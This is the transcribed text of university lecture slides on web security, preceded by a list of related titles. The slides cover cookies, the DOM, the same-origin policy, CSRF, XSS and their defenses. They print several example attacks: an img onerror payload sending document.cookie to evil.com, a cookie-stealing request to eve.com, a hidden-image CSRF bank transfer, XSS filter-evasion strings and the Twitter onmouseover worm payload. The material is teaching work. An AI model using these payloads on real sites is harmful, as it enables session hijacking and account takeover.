Web basics: HTTP cookies

Similar documents
Web basics: HTTP cookies

How is state managed in HTTP sessions. Web basics: HTTP cookies. Hidden fields (2) The principle. Disadvantage of this approach

Web Security II. Slides from M. Hicks, University of Maryland

2/16/18. CYSE 411/AIT 681 Secure Software Engineering. Secure Coding. The Web. Topic #11. Web Security. Instructor: Dr. Kun Sun

WEB SECURITY: XSS & CSRF

2/16/18. Secure Coding. CYSE 411/AIT 681 Secure Software Engineering. Web Security Outline. The Web. The Web, Basically.

CIS 4360 Secure Computer Systems XSS

Lecture 17 Browser Security. Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Some slides from Bailey's ECE 422

Security for the Web. Thanks to Dave Levin for some slides

Common Websites Security Issues. Ziv Perry

Information Security CS 526 Topic 8

Security for the Web. Thanks to Dave Levin for some slides

Information Security CS 526 Topic 11

Lecture Overview. IN5290 Ethical Hacking

Lecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks

Web Security: XSS; Sessions

Application vulnerabilities and defences

Web Security: Vulnerabilities & Attacks

Web Security: Vulnerabilities & Attacks

P2_L12 Web Security Page 1

RKN 2015 Application Layer Short Summary

Web Security IV: Cross-Site Attacks

CS 142 Winter Session Management. Dan Boneh

CSCE 813 Internet Security Case Study II: XSS

CS 161 Computer Security

Web Application Security

Is Browsing Safe? Web Browser Security. Subverting the Browser. Browser Security Model. XSS / Script Injection. 1. XSS / Script Injection

CSE361 Web Security. Attacks against the client-side of web applications. Nick Nikiforakis

last time: command injection

Web Application Security. Philippe Bogaerts

Computer Security 3e. Dieter Gollmann. Chapter 18: 1

Secure Coding and Code Review. Berlin : 2012

Client Side Injection on Web Applications

WEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang

CSCD 303 Essential Computer Security Fall 2018

Match the attack to its description:

CSC 482/582: Computer Security. Cross-Site Security

Web 2.0 and AJAX Security. OWASP Montgomery. August 21 st, 2007

Computer Security CS 426 Lecture 41

Copyright

More attacks on clients: Click-jacking/UI redressing, CSRF

CSC 405 Computer Security. Web Security

Exploiting and Defending: Common Web Application Vulnerabilities

EasyCrypt passes an independent security audit

WHY CSRF WORKS. Implicit authentication by Web browsers

Chrome Extension Security Architecture

CSCD 303 Essential Computer Security Fall 2017

CIS 5373 Systems Security

Preparing for the Cross Site Request Forgery Defense

Application Layer Attacks. Application Layer Attacks. Application Layer. Application Layer. Internet Protocols. Application Layer.

October 08: Introduction to Web Security

INF3700 Informasjonsteknologi og samfunn. Application Security. Audun Jøsang University of Oslo Spring 2015

5/19/2015. Objectives. JavaScript, Sixth Edition. Saving State Information with Query Strings. Understanding State Information

COMP9321 Web Application Engineering

7.2.4 on Media content; on XSS) sws2 1

The security of Mozilla Firefox s Extensions. Kristjan Krips

MWR InfoSecurity Advisory. 26 th April Elastic Path Administrative. Quit. Session Hijacking through Embedded XSS

CS Paul Krzyzanowski

Computer Security. 14. Web Security. Paul Krzyzanowski. Rutgers University. Spring 2018

Reflected XSS Cross-Site Request Forgery Other Attacks

PHP Security. Kevin Schroeder Zend Technologies. Copyright 2007, Zend Technologies Inc.

Robust Defenses for Cross-Site Request Forgery Review

COMP9321 Web Application Engineering

OWASP Top 10 Risks. Many thanks to Dave Wichers & OWASP


Introduction to Ethical Hacking

Content Security Policy

Web Security Computer Security Peter Reiher December 9, 2014

CNIT 129S: Securing Web Applications. Ch 3: Web Application Technologies

Abusing Windows Opener to Bypass CSRF Protection (Never Relay On Client Side)

Web Application with AJAX. Kateb, Faris; Ahmed, Mohammed; Alzahrani, Omar. University of Colorado, Colorado Springs

Application Security Introduction. Tara Gu IBM Product Security Incident Response Team

Cross-Site Scripting (XSS) Professor Larry Heimann Web Application Security Information Systems

WebGoat& WebScarab. What is computer security for $1000 Alex?

Advanced Web Technology 10) XSS, CSRF and SQL Injection

Web Security, Summer Term 2012

Web Security, Summer Term 2012

CSE361 Web Security. Attacks against the client-side of web applications. Nick Nikiforakis

CSE 484 / CSE M 584: Computer Security and Privacy. Web Security. Autumn Tadayoshi (Yoshi) Kohno

Web Attacks, con t. CS 161: Computer Security. Prof. Vern Paxson. TAs: Devdatta Akhawe, Mobin Javed & Matthias Vallentin

Lecture Notes on Safety and Information Flow on the Web: II

Attacking the Application OWASP. The OWASP Foundation. Dave Ferguson, CISSP Security Consultant FishNet Security.

CS526: Information security

Authentication and Password CS166 Introduction to Computer Security 2/11/18 CS166 1

Automatically Checking for Session Management Vulnerabilities in Web Applications

OWASP Top 10. Copyright 2017 Ergon Informatik AG 2/13

OWASP Top 10 The Ten Most Critical Web Application Security Risks

Code-Injection Attacks in Browsers Supporting Policies. Elias Athanasopoulos, Vasilis Pappas, and Evangelos P. Markatos FORTH-ICS

CHAPTER 8 CONCLUSION AND FUTURE ENHANCEMENTS

C1: Define Security Requirements

Detecting XSS Based Web Application Vulnerabilities

A Server- and Browser-Transparent CSRF Defense for Web 2.0 Applications

Web Security: Web Application Security [continued]

Your Scripts in My Page: What Could Possibly Go Wrong? Sebastian Lekies / Ben Stock Martin Johns

CS50 Quiz Review. November 13, 2017

Lecture 6: Web Security CS /17/2017


PROBLEMS IN PRACTICE: THE WEB MICHAEL ROITZSCH

W e b A p p l i c a t i o n S e c u r i t y : T h e D e v i l i s i n t h e D e t a i l s

6.170 Tutorial 7 - Rails Security. Prerequisites. Goals of this tutorial. Resources

Transcription:

Web basics: HTTP cookies Myrto Arapinis School of Informatics University of Edinburgh November 20, 2017 1 / 32

How is state managed in HTTP sessions HTTP is stateless: when a client sends a request, the server sends back a response but the server does not hold any information on previous requests The problem: in most web applications a client has to access various pages before completing a specific task and the client state should be kept along all those pages. How does the server know if two requests come from the same browser? Example: the server doesn t require a user to log at each HTTP request The idea: insert some token into the page when it is requested and get that token passed back with the next request Two main approaches to maintain a session between a web client and a web server use hidden fields use cookies 2 / 32

Hidden fields (1) The principle Include an HTML form with a hidden field containing a session ID in all the HTML pages sent to the client. This hidden field will be returned back to the server in the request. Example: the web server can send a hidden HTML form field along with a unique session ID as follows: <input type="hidden" name="sessionid" value="12345"> When the form is submitted, the specified name and value are automatically included in the GET or POST data. 3 / 32

Hidden fields (2) Disadvantage of this approach it requires careful and tedious programming effort, as all the pages have to be dynamically generated to include this hidden field session ends as soon as the browser is closed Advantage of this approach All browser supports HTML forms 4 / 32

Cookies (1) A cookie is a small piece of information that a server sends to a browser and stored inside the browser. A cookie has a name and a value, and other attribute such as domain and path, expiration date, version number, and comments 5 / 32

Cookies (1) A cookie is a small piece of information that a server sends to a browser and stored inside the browser. A cookie has a name and a value, and other attribute such as domain and path, expiration date, version number, and comments The browser automatically includes the cookie in all its subsequent requests to the originating host of the cookie 5 / 32

Cookies (1) A cookie is a small piece of information that a server sends to a browser and stored inside the browser. A cookie has a name and a value, and other attribute such as domain and path, expiration date, version number, and comments The browser automatically includes the cookie in all its subsequent requests to the originating host of the cookie Cookies are only sent back by the browser to their originating host and not any other hosts. Domain and path specify which server (and path) to return the cookie 5 / 32

Cookies (1) A cookie is a small piece of information that a server sends to a browser and stored inside the browser. A cookie has a name and a value, and other attribute such as domain and path, expiration date, version number, and comments The browser automatically includes the cookie in all its subsequent requests to the originating host of the cookie Cookies are only sent back by the browser to their originating host and not any other hosts. Domain and path specify which server (and path) to return the cookie A server can set the cookie s value to uniquely identify a client. Hence, cookies are commonly used for session and user management 5 / 32

Cookies (1) A cookie is a small piece of information that a server sends to a browser and stored inside the browser. A cookie has a name and a value, and other attribute such as domain and path, expiration date, version number, and comments The browser automatically includes the cookie in all its subsequent requests to the originating host of the cookie Cookies are only sent back by the browser to their originating host and not any other hosts. Domain and path specify which server (and path) to return the cookie A server can set the cookie s value to uniquely identify a client. Hence, cookies are commonly used for session and user management Cookies can be used to hold personalized information, or to help in on-line sales/service (e.g. shopping cart), or tracking popular links. 5 / 32

Cookies (2) GET......SET COOKIE:name=value... A cookie has several attributes: Set-Cookie: value[; expires=date][; domain=domain] [; path=path][; secure][; HttpOnly] expires : (whentobedeleted) } domain : (whentosend) scope path : (whentosend) secure : (onlyoverssl) HttpOnly : (onlyoverhttp) 6 / 32

Web basics: Web browsers 7 / 32

Web browsers [Ref] How browsers work: behind the scenes of modern web browsers. http://www.html5rocks.com/en/tutorials/internals/howbrowserswork/ Main function of a browser: present chosen web resource, by requesting it from the server and displaying it in the browser window Web resources: HTML documents, PDF files, images, or some other type of content Location of a web resource: specified by the user using a URI (Uniform Resource Identifier) 8 / 32

Browser components 9 / 32

Rendering engine basic flow DOM (Document Object Model): object presentation of the HTML document and the interface of HTML elements such as cookies to the outside world like JavaScript 10 / 32

The DOM [Ref] Introduction to the DOM. https://developer.mozilla.org/en- US/docs/DOM/DOM Reference/Introduction The Document Object Model (DOM) is a programming interface for HTML, XML and SVG documents The DOM provides a structured representation of the document (a tree) and it defines a way that the structure can be accessed from programs so that they can change the document structure, style and content The DOM provides a representation of the document as a structured group of nodes and objects that have properties and methods Nodes can also have event handlers attached to them, and once that event is triggered the event handlers get executed Essentially, it connects web pages to scripts or programming languages 11 / 32

The DOM Figure: https://www.wikipedia.org/wiki/document_object_model 12 / 32

Accessing the DOM When creating a script (in-line in a <script> element or by means of a script loading instruction) the API for the document or window elements can be used to manipulate the document itself or to get at the children of that document, which are the various elements in the web page 13 / 32

Accessing the DOM When creating a script (in-line in a <script> element or by means of a script loading instruction) the API for the document or window elements can be used to manipulate the document itself or to get at the children of that document, which are the various elements in the web page Example 1: displays an alert message by using the alert() function from the window object <body onload="window.alert( welcome to my page! );"> 13 / 32

Accessing the DOM When creating a script (in-line in a <script> element or by means of a script loading instruction) the API for the document or window elements can be used to manipulate the document itself or to get at the children of that document, which are the various elements in the web page Example 1: displays an alert message by using the alert() function from the window object <body onload="window.alert( welcome to my page! );"> Example 2: displays all the cookies associated with the current document in an alert message <body onload="window.alert(document.cookie);"> 13 / 32

Accessing the DOM When creating a script (in-line in a <script> element or by means of a script loading instruction) the API for the document or window elements can be used to manipulate the document itself or to get at the children of that document, which are the various elements in the web page Example 1: displays an alert message by using the alert() function from the window object <body onload="window.alert( welcome to my page! );"> Example 2: displays all the cookies associated with the current document in an alert message <body onload="window.alert(document.cookie);"> Example 3: sends all the cookies associated with the current document to the evil.com server if x points to a non-existant image <img src=x onerror=this.src= http://evil.com/? c= +document.cookie> 13 / 32

Same-origin policy (SOP) The problem: Assume you are logged into Facebook and visit a malicious website in another browser tab. Without the same origin policy JavaScript on that website could do anything to your Facebook account that you are allowed to do through accessing the DOM associated with the Facebook page. Part of the solution: The same-origin policy The SOP restricts how a document or script loaded from one origin (e.g. www.evil.com) can interact with a resource from another origin (e.g. www.bank.com). Each origin is kept isolated (sandboxed) from the rest of the web The SOP is very important when it comes to protecting HTTP cookies (used to maintain authenticated user sessions) 14 / 32

SOP Origin An origin is defined by the scheme, the host, and the port of a URL The SOP restricts the access to the DOM of a web resource to scripts loaded from the same origin Cross-origin access can be allowed using CORS (Cross Origin Resource Sharing): mechanism that allows many resources (e.g. fonts, JavaScript, etc.) on a web page to be requested from another domain outside the domain from which the resource originated Cross-site HTTP requests initiated from within scripts are subject to SOP restriction for security reasons 15 / 32

JavaScript Powerful web page programming language Scripts are embedded in web pages returned by the web server Scripts are executed by the browser. They can: alter page contents (DOM objects) track events (mouse clicks, motion, keystrokes) issue web requests and read replies maintain persistent connections (AJAX) Read and set cookies the HTML <script> elements can execute content retrieved from foreign origins 16 / 32

Web security: session hijacking 17 / 32

Session hijacking Wikipedia Session hijacking, sometimes also known as cookie hijacking, is the exploitation of a valid computer session to gain unauthorized access to information or services in a computer system Sessions could be compromised (hijacked) in different ways; the most common are: Cookie theft vulnerabilities: Predictable session tokens: = cookies should be unpredictable HTTPS/HTTP: site has mixed HTTPS/HTTP pages, and token is sent over HTTP = set the secure attribute for session tokens = when elevating user from anonymous to logged-in, always issue a new session token Cross-site scripting (XSS) vulnerabilities Cross-site request forgery (CSRF) vulnerabilities 18 / 32

Cross-site request forgery (CSRF) 19 / 32

CSRF OWASP CSRF forces a user to execute unwanted actions on a web application in which they re currently authenticated. CSRF attacks target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. Target: user who has an account on vulnerable server Main steps of attack: 1. build an exploit URL 2. trick the victim into making a request to the vulnerable server as if intentional Attacker tools: 1. ability to get the user to click exploit link 2. ability to have the victim visit attacker s server while logged-in to vulnerable server Keys ingredient: requests to vulnerable server have predictable structure 20 / 32

CSRF: a simple example Alice wishes to transfer $100 to Bob using the bank.com web application. This money transfer operation reduces to a request like: GET http://bank.com/transfer.do?acct=bob&amount=100 HTTP/1.1 The bank.com server is vulnerable to CSRF: the attacker can generate a valid malicious request for Alice to execute!! The attack comprises the following steps: 1. Eve crafts the following URL http://bank.com/transfer.do?acct=eve&amount=100000 2. When Alice visits Eve s website she tricks Alice s browser into accessing this URL 21 / 32

CSRF: a simple example eve.com <img src="http://bank.com/transfer.do? acct=eve&amount=100000" width="0" height="0" border="0"> client browser bank.com cookie http://bank.com/transfer.do?acct=eve&amount=100000 bank.com bank.com cookie 22 / 32

CSRF defenses Check the referrer header in the client s HTTP request can prevent CSRF attacks. Ensuring that the HTTP request has come from the original site means that attacks from other sites will not function Include a secret in every link/form! Can use a hidden form field, custom HTTP header, or encode it directly in the URL Must be unpredictable! Can be same value as session token (cookie) Ruby on Rails embeds secrets in every link automatically 23 / 32

Twitter SMS account hijacking (Nov. 2013) 24 / 32

Cross-site scripting (XSS) 25 / 32

XSS attack OWASP Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites The goal of an attacker is to slip code into the browser under the guise of conforming to the same-origin policy: site evil.com provides a malicious script attacker tricks the vulnerable server (bank.com) to send attacker s script to the user s browser! victim s browser believes that the script s origin is bank.com... because it does! malicious script runs with bank.com s access privileges XSS attacks can generally be categorized into two categories: stored and reflected 26 / 32

Stored XSS attacks stored attacks are those where the injected script is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc the victim then retrieves the malicious script from the server when it requests the stored information eve.com bank.com cookie 5. perform attacker action GET http://eve.com/steal?c=document.cookie client browser 4. execute malicious script with bank.com privileges 1. inject malicious script 2. request content 3. receive malicious script bank.com 5. perform attacker action GET http://bank.com/transfer.do?acct=eve&amount=100000 27 / 32

Reflected XSS attacks reflected attacks are those where the injected script is reflected off the web server, such as in an error message, search result, or any other response that includes some or all of the input sent to the server as part of the request reflected attacks are delivered to victims via another route, such as in an e-mail message, or on some other web site eve.com bank.com cookie client browser 1. visit eve.com 6. receive malicious page GET http://eve.com/steal?c=document.cookie 5. execute malicious script with bank.com 3. click on link (crafted by attacker) privileges 4. ECHO USER INPUT (chosen by attacker) 6. perform attacker action bank.com GET http://bank.com/transfer.do?acct=eve&amount=100000 28 / 32

Reflected XSS attacks The key to the reflected XSS attack Find a good web server that will echo the user input back in the HTML response Example Input from eve.com: http://vulnerabletoreflextedxss.com/search.php?term=hello Result from vulnerabletoreflextedxss.com: <html> <title> Search results </title> <body> Results for hello :... </body> </html> 29 / 32

XSS defenses Escape/filter output: escape dynamic data before inserting it into HTML < < > > & & " " remove any <script>, </script>, <javascript>, </javascript> (often done on blogs) But error prone: there are a lot of ways to introduce JavaScript <div style="background-image: url(javascript:alert( JavaScript ))">...</div> (CSS tags) <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]> <![CDATA[cript:alert( XSS );">]]> (XML-encoded data) Input validation: check that inputs (headers, cookies, query strings, form fields, and hidden fields) are of expected form (whitelisting) CSP: server supplies a whitelist of the scripts that are allowed to appear on the page 30 / 32

The onmouseover Twitter worm attack (Sept. 2010) 31 / 32

The onmouseover Twitter worm attack (Sept. 2010) When tweeting a URL, let s say www.bbc.co.uk Twitter will automatically include a link to that URL <a href="www.bbc.co.uk">www.bbc.co.uk</a> But Twitter didn t protect properly and for the following tweeted URL http://t.co/@"style="font-size:999999999999px; "onmouseover="$.getscript( http:... )" Automatically included the following link <a href="http://t.co/@"style="font-size:999999999999px;" onmouseover="$.getscript( http:... )">...</a> 32 / 32